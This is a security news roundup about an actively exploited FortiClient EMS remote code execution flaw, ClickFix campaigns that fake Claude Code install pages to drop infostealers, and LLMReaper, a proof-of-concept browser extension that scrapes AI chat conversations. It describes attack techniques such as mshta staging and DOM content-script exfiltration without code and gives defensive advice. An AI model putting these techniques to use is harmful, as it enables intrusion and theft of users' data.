CVE-2026-35616 is an unauthenticated CVSS 9.8 RCE in FortiClient EMS 7.4.5–7.4.6, actively exploited and chained with CVE-2026-21643. ClickFix campaigns are impersonating Claude Code installs via SEO poisoning. LLMReaper, a Chrome extension PoC, scrapes live ChatGPT/Claude/Gemini conversations via DOM injection. The attack surface now lives wherever an AI tool touches an endpoint.

FortiClient RCE Active , Claude Code ClickFix , LLMReaper St

Three security stories, one shared pattern: the attack surface now lives wherever an AI tool touches an endpoint. CVE-2026-35616 is an unauthenticated RCE chain in FortiClient Enterprise Management Server with a CVSS of 9.8 and active in-the-wild exploitation. A ClickFix campaign is impersonating the Claude Code installation page to drop infostealers on developer macs. And a Chrome extension called LLMReaper is scraping live ChatGPT, Claude, and Gemini conversations in real time. The common thread is that "AI tool" and "trusted software" are no longer different categories, and the threat model has to change accordingly.

What You Need to Know: CVE-2026-35616 is an unauthenticated improper-access-control flaw in FortiClient EMS 7.4.5–7.4.6 that lets an unauthenticated attacker execute code on the management server over HTTPS (CVSS 9.8). It's actively exploited and chained with CVE-2026-21643, another EMS flaw. Multiple threat researchers have published ClickFix-style campaigns that impersonate the Claude Code installer and use SEO poisoning and mshta-style staging to drop infostealers on developer machines. A Chrome extension called LLMReaper was published this week demonstrating how to scrape every conversation from ChatGPT, Claude, and Gemini in real time, by injecting content scripts into the AI web UIs.

Why It Matters

For security teams: If you run FortiClient EMS, patch 7.4.5/7.4.6 now and audit for IOCs. Unauthenticated, over-HTTPS, no user interaction, CVSS 9.8 — this is as bad as it gets.
For SOC analysts: CVE-2026-35616 is being chained with CVE-2026-21643 (an XSS / session-fixation class issue), so the kill chain is post-auth pivot from a pre-auth foothold. Treat the two as one bug.
For developers: "ClickFix" and "InstallFix" are the new phishing taxonomy. The payload is a fake AI tool install, the vector is a Google search result. The training has to extend to "did you actually navigate to the vendor's site?"
For browser security: LLMReaper shows that AI web UIs are now a viable exfiltration target. Any conversation you have in ChatGPT/Claude/Gemini is reachable from a malicious extension.
For AI vendors: The ClickFix and LLMReaper stories both depend on a trust gap between the official tool and the threat-actor-replica. Code signing, signed installer hashes, and verified-download pages are no longer nice-to-haves.

What Actually Happened

FortiClient EMS CVE-2026-35616 — unauthenticated RCE, actively exploited

On April 3, 2026, NVD published CVE-2026-35616: an "improper access control" vulnerability in Fortinet FortiClientEMS versions 7.4.5 through 7.4.6 that allows an unauthenticated attacker to execute arbitrary code on the management server. The EMS web interface over HTTPS needs no credentials to exploit it. The CVSS is 9.8 and it's been observed exploited in the wild, frequently chained with CVE-2026-21643 (a session / XSS-class issue in the same product) for post-auth pivot. Horizon3.ai's technical writeup walks through the API authentication bypass; Bishop Fox's analysis covers the exploit surface. Greenbone's blog has a clean summary and patch-now framing. The Penligent attack-lab post walks through the auth-bypass mechanics in detail.

The TL;DR for any team running FortiClient EMS: patch to 7.4.7 (or later) immediately, audit for IOCs from the Greenbone and Bishop Fox posts, and assume the management plane is compromised until you've validated otherwise. EMS sits on the endpoint-management plane, so a pre-auth RCE there is functionally a pre-auth RCE on every endpoint that talks to it. The 7.4.5–7.4.6 window is roughly 8 months of exposure.

"Claude Code install" search-result campaigns are the new ClickFix

Multiple research teams have published ClickFix-style campaigns that impersonate the Claude Code installation flow. SC World and Help Net Security document the pattern: SEO-poisoned search results for "claude code install" or "claude code setup" lead to fake install pages that prompt the user to run a command. The command uses mshta to stage PowerShell and process injection, ultimately dropping an infostealer. Malwarebytes found a Mac-focused variant in May 2026 that targets Mac users with fake Claude setup guides. Rapid7's writeup covers the broader ClickFix mechanics. 7AI also published research on a related campaign called "Claude Fraud" — fake Claude AI pages and a trojanized VS Code extension — here.

The pattern isn't new (ClickFix has been around for two years), but the application to AI dev tools is. The threat actor is exploiting the gap between "the developer Googled it" and "the developer navigated to the vendor's actual install page." The defensive answer is procedural: a written rule in your team that AI tool installs always go through the vendor's verified domain, never through a search-result click. The threat model's changed — phishing isn't just email anymore.

LLMReaper: a Chrome extension that scrapes ChatGPT, Claude, and Gemini

A Chrome extension called LLMReaper was published this week (June 1, 2026) demonstrating how to scrape every conversation from ChatGPT, Claude, and Gemini in real time. The technique, as described in Kartik Trivedi's LinkedIn post, is DOM-based: a content script runs in the context of the AI web UI, scrapes the conversation history as it streams, and exfiltrates it. The point of the publication appears to be a defensive warning — any malicious extension with the right host_permissions can do the same thing. The implication for security teams is uncomfortable: any conversation you have in a browser-based AI UI is potentially reachable from a malicious browser extension. For AI vendors, the implication is that the trust boundary has to move from "is the page legit" to "is the browser context safe," which is a much harder problem.

The Take

The shared pattern across all three stories is that the attack surface now lives wherever an AI tool touches an endpoint. CVE-2026-35616 puts pre-auth RCE on the management plane that brokers every endpoint session. ClickFix for Claude Code puts the initial access vector on the developer's install ritual. LLMReaper puts a passive exfiltration channel on every conversation the developer has with an AI assistant. Three different layers, one underlying assumption collapse: "AI tool" and "trusted software" are not different categories anymore, and the threat model has to be updated accordingly.

The FortiClient EMS bug is the one with the shortest fuse. CVSS 9.8, no auth, no user interaction, actively exploited, and chained with a second CVE in the same product. If you're running 7.4.5 or 7.4.6, you should be working the patch right now, not at the next change window. The post-auth pivot via CVE-2026-21643 means a single unpatched EMS is functionally a pre-auth RCE on every endpoint that checks in to it. The IOCs from Bishop Fox and Greenbone are worth running across your environment even if you're already patched, to detect any historical exploitation.

The ClickFix-for-AI-tools wave is the one that needs a procedural answer, not a technical one. You can patch a CVE; you can't patch a developer's Google reflex. The fix is a one-line team rule: "AI tool installs always go through the vendor's verified domain." Make it a checkbox in your security onboarding. The threat actor's whole business model depends on the gap between "the developer wanted the tool" and "the developer navigated to the right URL." Closing that gap takes the campaign down to noise.

LLMReaper is the early warning of a category that will get worse, not better. The DOM-based scraping technique works against any AI web UI, and there are hundreds of Chrome extensions with the right host_permissions already installed in your developers' browsers. The right defensive answer for security teams is a strict allowlist for browser extensions in any environment that touches AI conversations involving customer data or proprietary code. The right defensive answer for AI vendors is to make conversations unreachable from arbitrary content scripts — same-origin policy tightening, CSP headers that block inline scripts, and ideally a desktop client that doesn't run in a browser at all.

Quick Summary

CVE-2026-35616 is an unauthenticated CVSS 9.8 RCE in FortiClient EMS 7.4.5–7.4.6, actively exploited and chained with CVE-2026-21643. ClickFix campaigns impersonating Claude Code installs are dropping infostealers via SEO-poisoned search results. LLMReaper, a Chrome extension proof-of-concept, scrapes live ChatGPT/Claude/Gemini conversations via DOM injection. The attack surface now lives wherever an AI tool touches an endpoint.

Sources:

Source: TLDR | mr.technology — The Master Skill Index